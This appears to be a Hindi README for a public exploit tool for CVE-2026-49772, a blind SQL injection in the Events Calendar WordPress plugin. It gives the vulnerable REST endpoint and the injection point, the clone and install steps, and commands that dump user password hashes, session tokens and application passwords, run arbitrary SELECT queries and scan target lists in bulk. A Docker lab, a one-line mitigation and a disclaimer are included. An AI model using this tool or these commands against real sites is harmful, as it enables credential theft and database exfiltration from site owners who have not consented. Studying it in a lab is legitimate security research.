
# CVE-2026-49772 के लिए ब्लाइंड SQL इंजेक्शन एक्सप्लॉइट, जो The Events Calendar WordPress प्लगइन को लक्षित करता है। बूलियन/टाइम-आधारित ओरेकल के माध्यम से डेटाबेस सामग्री निकालता है, जिसमें मल्टीथ्रेडेड स्कैनिंग, यूज़र हैश डंपिंग और कस्टम क्वेरी सपोर्ट शामिल है।
CVE-2026-49772 वर्डप्रेस प्लगइन द इवेंट्स कैलेंडर में एक अप्रमाणित ब्लाइंड SQL इंजेक्शन है। एक टूटा हुआ REST पैरामीटर वैलिडेटर (validate_callback वैलिडेशन के बजाय एक क्लोज़र लौटाता है) प्रयोगात्मक tec/v1 REST API पर order पैरामीटर को अनसेनेटाइज़्ड होकर SQL ORDER BY क्लॉज़ तक पहुँचने देता है:
GET /wp-json/tec/v1/events?orderby=event_date&order=<इंजेक्शन>
... ORDER BY event_date <इंजेक्शन>, wp_posts.post_date DESC ...
यह एक केवल-पढ़ने योग्य इंजेक्शन है (कोई स्टैक्ड क्वेरी नहीं, कोई लेखन नहीं, कोई सीधा आउटपुट नहीं) — लेकिन पूरा डेटाबेस बूलियन/समय-आधारित ओरेकल के माध्यम से निकाला जा सकता है: उपयोगकर्ता पासवर्ड हैश, सत्र टोकन, एप्लिकेशन पासवर्ड, गुप्त कुंजियाँ।
प्रभावित संस्करण: द इवेंट्स कैलेंडर 6.15.12 – 6.16.2 (6.16.3 में ठीक किया गया)
गंभीरता: CVSS 3.1 9.3 क्रिटिकल — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
--check — बिना ब्रेक के पहचान: REST नेमस्पेस, प्लगइन संस्करण, समय-आधारित पुष्टि--recon — DB फ़िंगरप्रिंट: संस्करण, वर्तमान उपयोगकर्ता, डेटाबेस, OS, विशेषाधिकार, तालिका उपसर्ग--users — wp_users डंप करें: लॉगिन, ईमेल, पासवर्ड हैश--user-meta — wp_usermeta डंप करें: सत्र टोकन, एप्लिकेशन पासवर्ड, क्षमताएँ--get-table — स्वचालित कॉलम खोज के साथ किसी भी तालिका को डंप करें--query — किसी भी स्केलर SELECT का परिणाम निकालेंशुद्ध Python 3 मानक लाइब्रेरी — मानक वर्कफ़्लो के लिए requirements.txt शामिल है लेकिन कुछ अतिरिक्त स्थापित नहीं करता।
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help
python3 CVE-2026-49772.py <लक्ष्य> <कार्य> [विकल्प]
बिल्कुल एक कार्य चुनें: --check, --recon, --users, --user-meta,
--get-table <TABLE>, --query <SQL>। सभी विकल्पों के लिए --help चलाएँ।
python3 CVE-2026-49772.py target.tld --check
python3 CVE-2026-49772.py target.tld --recon
python3 CVE-2026-49772.py target.tld --users
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"
ट्यूनिंग: --technique boolean|time, --delay, --threads, --rows, --prefix,
--where, -useragent, -timeout। -l targets.txt के साथ कई होस्ट स्कैन करें।
एक स्व-निहित Docker Compose लैब जिसमें भेद्य प्लगइन (बंडल किया गया, बूट पर डाउनलोड नहीं किया गया) और पूर्व-बीजित इवेंट्स शामिल हैं। docker/DOCKER.md देखें।
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check
/wp-json/tec/v1/ को ब्लॉक करेंयह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग केवल उन सिस्टमों के खिलाफ करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। निर्माता इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।